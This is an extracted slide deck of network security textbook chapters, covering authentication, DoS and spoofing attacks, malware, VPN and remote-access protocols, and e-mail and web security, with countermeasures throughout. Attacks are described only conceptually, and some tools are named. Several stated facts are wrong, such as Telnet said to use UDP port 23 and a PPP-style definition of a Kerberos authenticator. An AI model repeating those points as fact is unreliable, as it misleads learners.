Upload
hardi-boeboet-saputra
View
220
Download
0
Embed Size (px)
Citation preview
8/3/2019 All Network Security
1/336
Guide to Network SecurityFundamentals
Chapter 1
C
8/3/2019 All Network Security
2/336
Learning Objectives Understand network security Understand security threat trends and their
ramifications Understand the goals of network security Determine the factors involved in a secure
network strategy
Understanding Network Security Network security
o Process by which digital information assets areprotected
Goalso Maintain integrityo Protect confidentialityo Assure availability
8/3/2019 All Network Security
3/336
Understanding Network Security Security ensures that users:
o Perform only tasks they are authorized to doo Obtain only information they are authorized to
haveo Cannot cause damage to data, applications, or
operating environment
Security Threats Identity theft Privacy concerns Wireless access
8/3/2019 All Network Security
4/336
To Offset Security Threats Integrity
o Assurance that data is not altered or destroyed inan unauthorized manner
Confidentialityo Protection of data from unauthorized disclosure to
a third party
Availabilityo Continuous operation of computing systems
Security Ramifications:Costs of Intrusion
Causes of network security threatso Technology weaknesseso Configuration weaknesseso Policy weaknesseso Human error
8/3/2019 All Network Security
5/336
Technology Weaknesses TCP/IP Operating systems Network equipment
Configuration Weaknesses Unsecured accounts System accounts with easily guessed
passwords Misconfigured Internet services
Unsecured default settings Misconfigured network equipment Trojan horse programs Vandals Viruses
8/3/2019 All Network Security
6/336
Policy Weaknesses Lack of a written security policy Politics High turnover Concise access controls not applied Software and hardware installation and
changes do not follow policy Proper security
Nonexistent disaster recovery plan
Human Error Accident Ignorance Workload Dishonesty
Impersonation Disgruntled employees Snoops Denial-of-service attacks
8/3/2019 All Network Security
7/336
Goals of Network Security Achieve the state where any action that is not
expressly permitted is prohibitedo Eliminate thefto Determine authenticationo Identify assumptionso Control secrets
Creating a Secure NetworkStrategy Address both internal and external threats Define policies and procedures Reduce risk across across perimeter security, the
Internet, intranets, and LANs
8/3/2019 All Network Security
8/336
Creating a Secure Network
Strategy Human factors Know your weaknesses Limit access Achieve security through persistence
o Develop change management process
Remember physical security Perimeter security
o
Control access to critical network applications,data, and services
continued
Creating a Secure NetworkStrategy Firewalls
o Prevent unauthorized access to or from privatenetwork
o Create protective layer between network andoutside world
o Replicate network at point of entry in order toreceive and transmit authorized data
o Have built-in filterso Log attempted intrusions and create reports
continued
8/3/2019 All Network Security
9/336
Creating a Secure Network
Strategy Web and file servers Access control
o Ensures that only legitimate traffic is allowed intoor out of the network Passwords PINs Smartcards
continued
Creating a Secure NetworkStrategy Change management
o Document changes to allareas of IT infrastructure
Encryptiono Ensures messages cannot be intercepted or read
by anyone other than the intended person(s)
continued
8/3/2019 All Network Security
10/336
Creating a Secure Network
Strategy Intrusion detection system (IDS)
o Provides 24/7 network surveillanceo Analyzes packet data streams within the networko Searches for unauthorized activity
Chapter Summary Understanding network security Security threats Security ramifications Goals of network security Creating a secure network strategy
8/3/2019 All Network Security
11/336
Chapter 2
Authentication
Learning Objectives Create strong passwords and store them
securely Understand the Kerberos authentication process Understand how CHAP works Understand what mutual authentication is and
why it is necessary Understand how digital certificates are created
and why they are used
continued
8/3/2019 All Network Security
12/336
Learning Objectives Understand what tokens are and how they
function Understand biometric authentication processes
and their strengths and weaknesses Understand the benefits of multifactor
authentication
Security of System Resources Three-step process (AAA)
o Authentication Positive identification of person/system seeking access to
secured information/services
o Authorization Predetermined level of access to resources
o Accounting Logging use of each asset
8/3/2019 All Network Security
13/336
Authentication Techniques
Usernames and passwords Kerberos Challenge Handshake Authentication Protocol
(CHAP) Mutual authentication Digital certificates Tokens Biometrics Multifactor authentication
Usernames and Passwords Username
o Unique alphanumeric identifier used to identify anindividual when logging onto a computer/network
Passwordo Secret combination of keystrokes that, when
combined with a username, authenticates a userto a computer/network
8/3/2019 All Network Security
14/336
Basic Rules for Password Protection
1.Memorize passwords; do not write them down2.Use different passwords for different functions3.Use at least 6 characters4.Use mixture of uppercase and lowercase letters,
numbers, and other characters5.Change periodically
Strong Password CreationTechniques
Easy to remember; difficult to recognize Examples:
o First letters of each word of a simple phrase; adda number and punctuation Asb4M?
o Combine two dissimilar words and place a numberbetween them SleigH9ShoE
o Substitute numbers for letters (not obviously)
8/3/2019 All Network Security
15/336
Techniques to Use MultiplePasswords
Group Web sites or applications by appropriatelevel of securityo Use a different password for each groupo Cycle more complex passwords down the groups,
from most sensitive to least
Storing Passwords Written
o Keep in a place you are not likely to lose ito Use small typeo Develop a personal code to apply to the list
Electronico Use a specifically designed application (encrypts
data)
8/3/2019 All Network Security
16/336
Kerberos
Provides secure and convenient way toaccess data and services through:o Session keyso Ticketso Authenticatorso Authentication serverso Ticket-granting ticketso Ticket-granting serverso Cross-realm authentication
Kerberos in a Simple Environment Session key
o Secret key used during logon session betweenclient and a service
Ticketo Set of electronic information used to authenticate
identity of a principal to a service
Authenticatoro Device (eg, PPP network server) that requires
authentication from a peer and specifiesauthentication protocol used in the configurerequest during link establishment phase
continued
8/3/2019 All Network Security
17/336
Kerberos in a Simple Environment Checksum
o Small, fixed-length numerical valueo Computed as a function of an arbitrary number of
bits in a messageo Used to verify authenticity of sender
Kerberos in a Simple Environment
8/3/2019 All Network Security
18/336
Kerberos in a More ComplexEnvironment
Ticket-granting ticket (TGT)o Data structure that acts as an authenticating proxy
to principals master key for set period of time Ticket-granting server (TGS)
o Server that grants ticket-granting tickets to aprincipal
Kerberos in a More ComplexEnvironment
8/3/2019 All Network Security
19/336
Kerberos in Very LargeNetwork Systems
Cross-realm authenticationo Allows principal to authenticate itself to gain
access to services in a distant part of a Kerberossystem
Cross-Realm Authentication
8/3/2019 All Network Security
20/336
Security Weaknesses of Kerberos Does not solve password-guessing attacks Must keep password secret Does not prevent denial-of-service attacks Internal clocks of authenticating devices must be
loosely synchronized Authenticating device identifiers must not be
recycled on a short-term basis
Challenge Handshake AuthenticationProtocol (CHAP)
PPP mechanism used by an authenticator toauthenticate a peer
Uses an encrypted challenge-and-responsesequence
8/3/2019 All Network Security
21/336
CHAP Challenge-and-ResponseSequence
CHAP Security Benefits Multiple authentication sequences throughout
Network layer protocol sessiono Limit time of exposure to any single attack
Variable challenge values and changingidentifierso Provide protection against playback attacks
8/3/2019 All Network Security
22/336
CHAP Security Issues Passwords should not be the same in both
directions Not all implementations of CHAP terminate the
link when authentication process fails, but insteadlimit traffic to a subset of Network layer protocolso Possible for users to update passwords
Mutual Authentication Process by which each party in an electronic
communication verifies the identity of the otherparty
8/3/2019 All Network Security
23/336
Digital Certificates Electronic means of verifying identity of an
individual/organization Digital signature
o Piece of data that claims that a specific, namedindividual wrote or agreed to the contents of anelectronic document to which the signature isattached
Electronic Encryption andDecryption Concepts
Encryptiono Converts plain text message into secret message
Decryptiono Converts secret message into plain text message
Symmetric ciphero Uses only one key
Asymmetric ciphero Uses a key pair (private key and public key)
continued
8/3/2019 All Network Security
24/336
Electronic Encryption andDecryption Concepts
Certificate authority (CA)o Trusted, third-party entity that verifies the actual
identity of an organization/individual beforeproviding a digital certificate
Nonrepudiationo Practice of using a trusted, third-party entity to
verify the authenticity of a party who sends amessage
8/3/2019 All Network Security
25/336
How Much TrustShould One Place in a CA?
Reputable CAs have several levels ofauthentication that they issue based on theamount of data collected from applicants
Example: VeriSign
Security Tokens Authentication devices assigned to specific user Small, credit card-sized physical devices Incorporate two-factor authentication methods Utilize base keys that are much stronger than
short, simple passwords a person can remember
8/3/2019 All Network Security
26/336
Types of Security Tokens Passive
o Act as a storage device for the base keyo Do not emit, or otherwise share, base tokens
Activeo Actively create another form of a base key or
encrypted form of a base key that is not subject toattack by sniffing and replay
o Can provide variable outputs in variouscircumstances
One-Time Passwords Used only once for limited period of time; then
is no longer valid Uses shared keys and challenge-and-
response systems, which do not require thatthe secret be transmitted or revealed
Strategies for generating one-time passwordso Counter-based tokenso Clock-based tokens
8/3/2019 All Network Security
27/336
Biometrics Biometric authentication
o Uses measurements of physical or behavioralcharacteristics of an individual
o Generally considered most accurate of allauthentication methods
o Traditionally used in highly secure areaso Expensive
How Biometric Authentication Works
1.Biometric is scanned after identity is verified2.Biometric information is analyzed and put into
an electronic template3.Template is stored in a repository4.To gain access, biometric is scanned again5.Computer analyzes biometric data and
compares it to data in template
6.If data from scan matches data in template,person is allowed access7.Keep a record, following AAA model
8/3/2019 All Network Security
28/336
False Positives and FalseNegatives False positive
o Occurrence of an unauthorized person beingauthenticated by a biometric authenticationprocess
False negativeo Occurrence of an authorized person not being
authenticated by a biometric authenticationprocess when they are who they claim to be
Different Kinds of Biometrics Physical characteristics
o Fingerprintso Hand geometryo Retinal scanningo Iris scanningo Facial scanning
Behavioral characteristicso Handwritten signatures
o Voice
8/3/2019 All Network Security
29/336
Fingerprint Biometrics
Hand Geometry Authentication
8/3/2019 All Network Security
30/336
Retinal Scanning
Iris Scanning
8/3/2019 All Network Security
31/336
Signature Verification
General Trends in Biometrics Authenticating large numbers of people over a
short period of time (eg, smart cards) Gaining remote access to controlled areas
8/3/2019 All Network Security
32/336
Multifactor Authentication Identity of individual is verified using at least two
of the three factors of authenticationo Something you know (eg, password)o Something you have (eg, smart card)o Something about you (eg, biometrics)
Chapter Summary Authentication techniques
o Usernames and passwordso Kerberoso CHAPo Mutual authenticationo Digital certificateso Tokenso Biometricso
Multifactor authentication
8/3/2019 All Network Security
33/336
Chapter 3
Attacks and Malicious Code
Learning Objectives Explain denial-of-service (DoS) attacks Explain and discuss ping-of-death attacks Identify major components used in a DDoS attack
and how they are installed Understand major types of spoofing attacks Discuss man-in-the-middle attacks, replay
attacks, and TCP session hijacking
continued
8/3/2019 All Network Security
34/336
Learning Objectives Detail three types of social-engineering attacks
and explain why they can be incredibly damaging List major types of attacks used against
encrypted data List major types of malicious software and
identify a countermeasure for each one
Denial-of-Service Attacks Any malicious act that causes a system to be
unusable by its real user(s) Take numerous forms Are very common Can be very costly Major types
o SYN floodo Smurf attack
8/3/2019 All Network Security
35/336
SYN Flood Exploits the TCP three-way handshake Inhibits servers ability to accept new TCP
connections
TCP Three-Way Handshake
8/3/2019 All Network Security
36/336
8/3/2019 All Network Security
37/336
Smurf Non-OS specific attack that uses the network to
amplify its effect on the victim Floods a host with ICMP Saturates Internet connection with bogus traffic
and delays/prevents legitimate traffic fromreaching its destination
8/3/2019 All Network Security
38/336
IP Fragmentation Attacks:Ping of Death
Uses IP packet fragmentation techniques tocrash remote systems
Ping of Death
8/3/2019 All Network Security
39/336
Distributed Denial-of-Service Attacks
Use hundreds of hosts on the Internet toattack the victim by flooding its link to theInternet or depriving it of resources
Used by hackers to target government andbusiness Internet sites
Automated tools; can be executed by scriptkiddies
Result in temporary loss of access to a givensite and associated loss in revenue and
prestige
8/3/2019 All Network Security
40/336
Conducting DDoS Attacks
DDoS Countermeasures Security patches from software vendors Antivirus software Firewalls Ingress (inbound) and egress (outbound) filtering
8/3/2019 All Network Security
41/336
Ingress and Egress Filtering
Preventing the Network fromInadvertently Attacking Others
Filter packets coming into the network destinedfor a broadcast address
Turn off directed broadcasts on internal routers Block any packet from entering the network that
has a source address that is not permissible onthe Internet (see Figures 3-8 and 3-9)
continued
8/3/2019 All Network Security
42/336
Preventing the Network fromInadvertently Attacking Others
Block at the firewall any packet that uses aprotocol or port that is not used for Internetcommunications on the network
Block packets with a source address originatinginside your network from entering your network
Ingress Filtering of Packetswith RFC 1918 Addresses
8/3/2019 All Network Security
43/336
Filtering of Packetswith RFC 2827 Addresses
Spoofing Act of falsely identifying a packets IP address,
MAC address, etc Four primary types
o IP address spoofingo ARP poisoningo Web spoofingo DNS spoofing
8/3/2019 All Network Security
44/336
IP Address Spoofing Used to exploit trust relationships between two
hosts Involves creating an IP address with a forged
source address
8/3/2019 All Network Security
45/336
ARP Poisoning Used in man-in-the-middle and session hijacking
attacks; attacker takes over victims IP addressby corrupting ARP caches of directly connectedmachines
Attack toolso ARPoisono Ettercapo Parasite
Web Spoofing Convinces victim that he or she is visiting a real
and legitimate site Considered both a man-in-the-middle attack and
a denial-of-service attack
8/3/2019 All Network Security
46/336
Web Spoofing
DNS Spoofing Aggressor poses as the victims legitimate DNS
server Can direct users to a compromised server Can redirect corporate e-mail through a hackers
server where it can be copied or modified beforesending mail to final destination
8/3/2019 All Network Security
47/336
To Thwart Spoofing Attacks IP spoofing
o Disable source routing on all internal routerso Filter out packets entering local network from the
Internet that have a source address of the localnetwork
ARP poisoningo Use network switches that have MAC binding
features
continued
To Thwart Spoofing Attacks Web spoofing
o Educate users DNS spoofing
o Thoroughly secure DNS serverso Deploy anti-IP address spoofing measures
8/3/2019 All Network Security
48/336
Man in the Middle Class of attacks in which the attacker places
himself between two communicating hosts andlistens in on their session
To protect againsto Configure routers to ignore ICMP redirect packets
Man-in-the-Middle Attacks
8/3/2019 All Network Security
49/336
Man-in-the-Middle Applications Web spoofing TCP session hijacking Information theft Other attacks (denial-of-service attacks,
corruption of transmitted data, traffic analysis togain information about victims network)
Man-in-the-Middle Methods ARP poisoning ICMP redirects DNS poisoning
8/3/2019 All Network Security
50/336
Replay Attacks Attempts to circumvent authentication
mechanisms by:o Recording authentication messages from a
legitimate usero Reissuing those messages in order to
impersonate the user and gain access to systems
Replay Attack
8/3/2019 All Network Security
51/336
TCP Session Hijacking Attacker uses techniques to make the victim
believe he or she is connected to a trusted host,when in fact the victim is communicating with theattacker
Well-known toolo Hunt (Linux)
8/3/2019 All Network Security
52/336
Attacker Using Victims TCPConnection
Social Engineering Class of attacks that uses trickery on people
instead of computers Goals
o Fraudo Network intrusiono Industrial espionageo Identity thefto Desire to disrupt the system or network
8/3/2019 All Network Security
53/336
Dumpster Diving
Online Attacks Use chat and e-mails venues to exploit trust
relationships
8/3/2019 All Network Security
54/336
Social Engineering Countermeasures
Take proper care of trash and discarded items Ensure that all system users have periodic
training about network security
Attacks Against Encrypted Data Weak keys Mathematical attacks Birthday attack Password guessing Brute force Dictionary
8/3/2019 All Network Security
55/336
Weak Keys Secret keys used in encryption that exhibit
regularities in encryption, or even a poor level ofencryption
Mathematical Attack Attempts to decrypt encrypted data using
mathematics to find weaknesses in theencryption algorithm
Categories of cryptanalysiso Cyphertext-only analysiso Known plaintext attacko Chosen plaintext attack
8/3/2019 All Network Security
56/336
Birthday Attack Class of brute-force mathematical attacks that
exploits mathematical weaknesses of hashalgorithms and one-way hash functions
Password Guessing Tricks authentication mechanisms by determining
a users password using techniques such asbrute force or dictionary attacks
8/3/2019 All Network Security
57/336
Brute Force Method of breaking passwords that involves
computation of every possible combination ofcharacters for a password of a given characterlength
8/3/2019 All Network Security
58/336
Dictionary Method of breaking passwords by using a
predetermined list of words as input to thepassword hash
Only works against poorly chosen passwords
Software Exploitation Utilizes software vulnerabilities to gain access
and compromise systems Example
o Buffer overflow attach To stop software exploits
o Stay appraised of latest security patches providedby software vendors
8/3/2019 All Network Security
59/336
Malicious Software
Viruses Self-replicating programs that spread by
infecting other programs Damaging and costly
8/3/2019 All Network Security
60/336
Virus Databases
8/3/2019 All Network Security
61/336
Evolution of Virus PropagationTechniques
Protecting Against Viruses Enterprise virus protection solutions
o Desktop antivirus programso Virus filters for e-mail serverso Network appliances that detect and remove
viruses
Instill good behaviors in users and systemadministratorso Keep security patches and virus signature
databases up to date
8/3/2019 All Network Security
62/336
8/3/2019 All Network Security
63/336
Trojan Horses Class of malware that uses social engineering to
spread Types of methods
o Sending copies of itself to all recipients in usersaddress book
o Deleting or modifying fileso Installing backdoor/remote control programs
8/3/2019 All Network Security
64/336
Logic Bombs
Set of computer instructions that lie dormantuntil triggered by a specific event
Once triggered, the logic bomb performs amalicious task
Almost impossible to detect until aftertriggered
Often the work of former employees For example: macro virus
o Uses auto-execution feature of specific
applications
Worms Self-contained program that uses security flaws
such as buffer overflows to remotely compromisea victim and replicate itself to that system
Do not infect other executable programs Account for 80% of all malicious activity on
Internet Examples: Code Red, Code Red II, Nimda
8/3/2019 All Network Security
65/336
Defense Against Worms Latest security updates for all servers Network and host-based IDS Antivirus programs
Chapter Summary Mechanisms, countermeasures, and best
practices for:o Malicious softwareo Denial-of-service attackso Software exploitso Social engineeringo Attacks on encrypted data
8/3/2019 All Network Security
66/336
Chapter 4
Remote Access
Learning Objectives Understand implications of IEEE 802.1x and
how it is used Understand VPN technology and its uses for
securing remote access to networks Understand how RADIUS authentication
works Understand how TACACS+ operates
Understand how PPTP works and when it isused
continued
8/3/2019 All Network Security
67/336
Learning Objectives Understand how L2TP works and when it is used Understand how SSH operates and when it is
used Understand how IPSec works and when it is used Understand the vulnerabilities associated with
telecommuting
IEEE 802.1x Internet standard created to perform
authentication services for remote access to acentral LAN
Uses SNMP to define levels of access controland behavior of ports providing remote access toLAN environment
Uses EAP over LAN (EAPOL) encapsulationmethod
8/3/2019 All Network Security
68/336
802.1x General Topology
8/3/2019 All Network Security
69/336
Telnet Standard terminal emulation protocol within
TCP/IP protocol suite defined by RFC 854 Utilizes UDP port 23 to communicate Allows users to log on to remote networks and
use resources as if locally connected
Controlling Telnet Assign enable password as initial line of defense Use access lists that define who has access to
what resources based on specific IP addresses Use a firewall that can filter traffic based on ports,
IP addresses, etc
8/3/2019 All Network Security
70/336
Virtual Private Network Secures connection between user and home
office using authentication mechanisms andencryption techniqueso Encrypts data at both ends
Uses two technologieso IPSeco PPTP
VPN Diagram
8/3/2019 All Network Security
71/336
Tunneling Enables one network to send its data via another
networks connections Encapsulates a network protocol within packets
carried by the second network
Tunneling
8/3/2019 All Network Security
72/336
VPN Options Install/configure client computer to initiate
necessary security communications Outsource VPN to a service provider
o Encryption does not happen until data reachesproviders network
Service Providing Tunneling
8/3/2019 All Network Security
73/336
VPN Drawbacks Not completely fault tolerant Diverse implementation choices
o Software solutions Tend to have trouble processing all the simultaneous
connections on a large network
o Hardware solutions Require higher costs
Remote Authentication Dial-in UserService (RADIUS)
Provides a client/server security system Uses distributed security to authenticate users
on a network Includes two pieces
o Authentication servero Client protocols
Authenticates users through a series ofcommunications between client and serverusing UDP
8/3/2019 All Network Security
74/336
Authenticating with a RADIUS Server
Benefits of Distributed Approach toNetwork Security
Greater security Scalable architecture Open protocols Future enhancements
8/3/2019 All Network Security
75/336
Terminal Access Controller AccessControl System (TACACS+)
Authentication protocol developed by Cisco Uses TCP a connection-oriented
transmission instead of UDP Offers separate acknowledgement that
request has been received regardless ofspeed of authentication mechanism
Provides immediate indication of a crashedserver
8/3/2019 All Network Security
76/336
Advantages of TACACS+over RADIUS
Addresses need for scalable solution Separates authentication, authorization, and
accounting Offers multiple protocol support
Point-to-Point Tunneling Protocol Multiprotocol that offers authentication,
methods of privacy, and data compression Built upon PPP and TCP/IP Achieves tunneling by providing encapsulation
(wraps packets of information within IPpackets)o Data packetso Control packets
Provides users with virtual node on corporateLAN or WAN
8/3/2019 All Network Security
77/336
PPTP Tasks
Queries status of communications servers Provides in-band management Allocates channels and places outgoing calls Notifies Windows NT Server of incoming calls Transmits and receives user data with bi-
directional flow control Notifies Windows NT Server of disconnected
calls Assures data integrity; coordinates packet
flow
Layer Two Tunneling Protocol PPP defines an encapsulation mechanism for
transporting multiprotocol packets across layertwo point-to-point links
L2TP extends PPP model by allowing layer twoand PPP endpoints to reside on different devicesinterconnected by a packet-switched network
continued
8/3/2019 All Network Security
78/336
Layer Two Tunneling Protocol Allows separation of processing of PPP packets
and termination of layer two circuito Connection may terminate at a (local) circuit
concentrator Solves splitting problems by projecting a PPP
session to a location other than the point at whichit is physically received
Secure Shell (SSH) Secure replacement for remote logon and file
transfer programs (Telnet and FTP) thattransmit data in unencrypted text
Uses public key authentication to establish anencrypted and secure connection from usersmachine to remote machine
Used to:o Log on to another computer over a networko Execute command in a remote machineo Move files from one machine to another
8/3/2019 All Network Security
79/336
Key Components of an SSH Product
Engine Administration server Enrollment gateway Publishing server
IP Security Protocol Set of protocols developed by the IETF to
support secure exchange of packets at IPlayer
Deployed widely to implement VPNs Works with existing and future IP standards Transparent to users Promises painless scalability
Handles encryption at packet level usingEncapsulating Security Payload (ESP)
8/3/2019 All Network Security
80/336
IPSec Security Payload
ESP and Encryption Models Supports many encryption protocols Encryption support is designed for use by
symmetric encryption algorithms Provides secure VPN tunneling
8/3/2019 All Network Security
81/336
Telecommuting Vulnerabilities
Telecommuting Vulnerabilities
8/3/2019 All Network Security
82/336
Telecommuting Vulnerabilities
Telecommuting Vulnerabilities
8/3/2019 All Network Security
83/336
Telecommuting Vulnerabilities
Remote Solutions Microsoft Terminal Server Citrix Metaframe Virtual Network Computing
8/3/2019 All Network Security
84/336
8/3/2019 All Network Security
85/336
Chapter 5
Learning Objectives Understand the need for secure e-mail Outline benefits of PGP and S/MIME Understand e-mail vulnerabilities and how to
safeguard against them Explain the dangers posed by e-mail hoaxes and
spam, as well as actions that can be taken tocounteract them
8/3/2019 All Network Security
86/336
Challenges to Utility and ProductivityGains Offered by E-mail
E-mail security Floods of spam Hoaxes
E-mail Security Technologies Two main standards
o Pretty good privacy (PGP)o Secure/Multipurpose Internet Mail Extension
(S/MIME)
These competing standards:o Seek to ensure integrity and privacy of information
by wrapping security measures around e-mail dataitself
o Use public key encryption techniques (alternativeto securing communication link itself, as in VPN)
8/3/2019 All Network Security
87/336
Secure E-mail and Encryption
Secure e-mailo Uses cryptography to secure messages
transmitted across insecure networks
Advantages of e-mail encryptiono E-mail can be transmitted over unsecured linkso E-mail can be stored in encrypted form
Key cryptography conceptso Encryptiono Digital signatureso Digital certificates
Main Features of Secure E-mail Confidentiality Integrity Authentication Nonrepudiation
8/3/2019 All Network Security
88/336
Encryption Passes data and a value (key) through a series
of mathematical formulas that make the dataunusable and unreadable
To recover information, reverse the processusing the appropriate key
Two main typeso Conventional cryptographyo Public key cryptography
Encryption
8/3/2019 All Network Security
89/336
Hash Functions Produce a message digest that cannot be
reversed to produce the original Two major hash functions in use
o SHA-1 (Secure Hash Algorithm 1)o MD5 (Message Digest algorithm version 5)
Digital Signatures Electronic identification of a person or thing
created by using a public key algorithm Verify (to a recipient) the integrity of data and
identity of the sender Provide same features as encryption, except
confidentiality Created by using hash functions
8/3/2019 All Network Security
90/336
Digital Certificates Electronic document attached to a public key
by a trusted third party Provide proof that the public key belongs to a
legitimate owner and has not beencompromised
Consist of:o Owners public keyo Information unique to ownero Digital signatures or an endorser
8/3/2019 All Network Security
91/336
Combining Encryption Methods Hybrid cryptosystems
o Take advantage of symmetric and public keycryptography
o Example: PGP/MIME Conventional encryption
o Fast, but results in key distribution problem Public key encryption
o Private key and public key
8/3/2019 All Network Security
92/336
Public Key Encryption
How Secure E-mail Works Encryption
1.Message is compressed2.Session key is created3.Message is encrypted using session key with
symmetrical encryption method4.Session key is encrypted with an asymmetrical
encryption method5.Encrypted session key and encrypted message
are bound together and transmitted to recipient Decryption: reverse the process
8/3/2019 All Network Security
93/336
Secure E-mail Decryption
8/3/2019 All Network Security
94/336
Background on PGP
Current de facto standard Written by Phil Zimmerman 1991 Supports major conventional encryption
methodso CASTo International Data Encryption Algorithm (IDEA)o Triple Data Encryption Standard (3DES)o Twofish
PGP Certificates More flexible and extensible than X.509
certificates A single certificate can contain multiple
signatures
8/3/2019 All Network Security
95/336
PGP Certificate Format
S/MIME Specification designed to add security to
e-mail messages in MIME format Security services
o Authentication (using digital signatures)o Privacy (using encryption)
8/3/2019 All Network Security
96/336
What S/MIME Defines
Format for MIME data Algorithms that must be used for
interoperabilityo RSAo RC2o SHA-1
Additional operational concernso ANSI X.509 certificateso Transport over the Internet
S/MIME Background Four primary standards
o RFC 2630 Cryptographic Message Syntax
o RFC 2633 S/MIME version 3 Message Specification
o RFC 2632 S/MIME version 3 Certificate Handling
o RFC 2634 Enhanced Security Services for S/MIME
8/3/2019 All Network Security
97/336
S/MIME Encryption Algorithms
Three symmetric encryption algorithmso DESo 3DESo RC2
PKCS (Public Key Cryptography Standards) S/MIME prevents exposure of signature
information to eavesdroppero Applies digital signature first; then encloses
signature and original message in an encrypteddigital envelope
X.509 Certificates Rather than define its own certificate type (like
PGP), S/MIME relies on X.509 Issued by a certificate authority (CA)
8/3/2019 All Network Security
98/336
S/MIME Trust Model:Certificate Authorities
Purely hierarchical model Line of trust goes up the chain to a CA, whose
business is verifying identity and assuring validityof keys or certificates
8/3/2019 All Network Security
99/336
Differences BetweenPGP and S/MIME
Features S/MIME3 OpenPGP
Structure ofmessages
Binary, based onCMS
PGP
Structure of digitalcertificates
X.509 PGP
Algorithm:symmetricencryption
3DES 3DES
Algorithm: digitalsignature
Diffie-Hellman EIGamal
continued
Differences BetweenPGP and S/MIME
Features S/MIME3 OpenPGP
Algorithm: hash SHA-1 SHA-01
MIMEencapsulation forsigned data
Choice ofmultipart/signed orCMS format
Multipart/signedwith ASCII armor
MIMEencapsulation forencrypted data
Application/PKCS#7-MIME Multipart/encrypted
Trust model Hierarchical Web of trust
continued
8/3/2019 All Network Security
100/336
Differences BetweenPGP and S/MIME
Features S/MIME3 OpenPGP
Marketplaceadoption
Growing quickly Current encryptionstandard
Marketplaceadvocates
Microsoft, RSA,VeriSign
Some PGP, Inc.products absorbedinto McAfee line
Ease of use Configuration notintuitive; must obtain
and installcertificates; generaluse straight-forward
Configuration notintuitive; must
create certificates;general usestraight-forward
continued
Differences BetweenPGP and S/MIME
Features S/MIME3 OpenPGP
Software Already integratedin Microsoft andNetscape products
PGP software mustbe downloadedand installed
Cost ofcertificates
Must be purchasedfrom CA; yearly fee
PGP certificatescan be generatedby anyone; free
Keymanagement
Easy, but you musttrust CA
Harder; user mustmake decisions onvalidity of identities
continued
8/3/2019 All Network Security
101/336
Differences BetweenPGP and S/MIME
Features S/MIME3 OpenPGP
Compatibility Transparentlyworks with anyvendors MIME e-mail client, but notcompatible withnon-MIMEe-mail formats
Compatible withMIME and non-MIMEe-mail formats, butrecipient must havePGP installed
Centralized
management
Possible through
PKI
Status is in doubt
E-mail Vulnerabilities
continued
8/3/2019 All Network Security
102/336
E-mail Vulnerabilities
Spam Act of flooding the Internet with many copies of
the same message in an attempt to force themessage on people who would not otherwisechoose to receive it
Unrequested junk mail
8/3/2019 All Network Security
103/336
E-mail Spam Targets individual users with direct mail
messages Creates lists by:
o Scanning Usenet postingso Stealing Internet mailing listso Searching the Web for addresses
Uses automated tools to subscribe to as manymailing lists as possible
Hoaxes and Chain Letters E-mail messages with content designed to get
the reader to spread them by:o Appealing to be an authority to exploit trusto Generating excitement about being involvedo Creating a sense of importance/belongingo Playing on peoples gullibility/greed
Do not carry malicious payload, but are usuallyuntrue or resolved
8/3/2019 All Network Security
104/336
Costs of Hoaxes and ChainLetters Lost productivity Damaged reputation Relaxed attitude toward legitimate virus warnings
8/3/2019 All Network Security
105/336
Countermeasures for Hoaxes Effective security awareness campaign Good e-mail policy E-mail content filtering solutions
8/3/2019 All Network Security
106/336
Guidelines for HoaxCountermeasures
Create a policy and train users on what to dowhen they receive a virus warning
Establish the intranet site as the onlyauthoritative source for advice on viruswarnings
Ensure that the intranet site displays up-to-date virus and hoax information on the homepage
Inform users that if the virus warning is not
listed on the intranet site, they should forwardit to a designated account
Chapter Summary PGP
o Current de facto e-mail encryption standardo Basis of OpenPGP standard
S/MIMEo Emerging standard in e-mail encryptiono Uses X.509 certificates used by Microsoft and
Netscape browser and e-mail client software
E-mail vulnerabilities and scams, and how to
combat themo Spamo Hoaxes and e-mail chain letters
8/3/2019 All Network Security
107/336
Chapter 6
Web Security
Learning Objectives Understand SSL/TLS protocols and their
implementation on the Internet Understand HTTPS protocol as it relates to SSL Explore common uses of instant messaging
applications and identify vulnerabilitiesassociated with those applications
continued
8/3/2019 All Network Security
108/336
Learning Objectives Understand the vulnerabilities of JavaScript,
buffer overflow, ActiveX, cookies, CGI, applets,SMTP relay, and how they are commonlyexploited
Secure Sockets Layer (SSL) andTransport Layer Security (TLS)
Commonly used protocols for managing thesecurity of a message transmission across theinsecure Internet
8/3/2019 All Network Security
109/336
Secure Sockets Layer (SSL) Developed by Netscape for transmitting private
documents via the Internet Uses a public key to encrypt data that is
transferred over the SSL connection URLs that require an SSL connection start with
https: instead of http:
Transport Layer Security (TLS) Latest version of SSL Not as widely available in browsers
8/3/2019 All Network Security
110/336
SSL/TLS Protocol
Runs on top of the TCP and below higher-level protocols
Uses TCP/IP on behalf of higher-levelprotocols
Allows SSL-enabled server to authenticateitself to SSL-enabled client
Allows client to authenticate itself to server Allows both machines to establish an
encrypted connection
Secure Sockets Layer Protocol
8/3/2019 All Network Security
111/336
SSL/TLS Protocol Uses ciphers to enable encryption of data
between two parties Uses digital certificates to enable authentication
of the parties involved in a secure transaction
Cipher Types Used by SSL/TLS Asymmetric encryption (public key encryption) Symmetric encryption (secret key encryption)
8/3/2019 All Network Security
112/336
Digital Certificates
Componentso Certificate users nameo Entity for whom certificate is being issuedo Public key of the subjecto Time stamp
Typically issued by a CA that acts as a trustedthird partyo Public certificate authoritieso Private certificate authorities
Secure Hypertext Transfer Protocol(HTTPS)
Communications protocol designed to transferencrypted information between computersover the World Wide Web
An implementation of HTTP Often used to enable online purchasing or
exchange of private information over insecurenetworks
Combines with SSL to enable securecommunication between a client and a server
8/3/2019 All Network Security
113/336
Instant Messaging (IM)
Communications service that enables creationof a private chat room with another individual
Based on client/server architecture Typically alerts you whenever someone on
your private list is online Categorized as enterprise IM or consumer IM
systems Examples: AOL Instant Messenger, ICQ,
NetMessenger, Yahoo! Messenger
IM Security Issues Cannot prevent transportation of files that
contain viruses and Trojan horses Misconfigured file sharing can provide access
to sensitive or confidential data Lack of encryption Could be utilized for transportation of
copyrighted material; potential for substantial
legal consequences Transferring files reveals network addressesof hosts; could be used for Denial-of-Serviceattack
8/3/2019 All Network Security
114/336
IM Applications Do not use well-known TCP ports for
communication and file transfers; use registeredports
Ports can be filtered to restrict certainfunctionalities or prevent usage altogether
Vulnerabilities of Web Tools Security of Web applications and online
services is as important as intendedfunctionalityo JavaScripto ActiveXo Bufferso Cookieso Signed applets
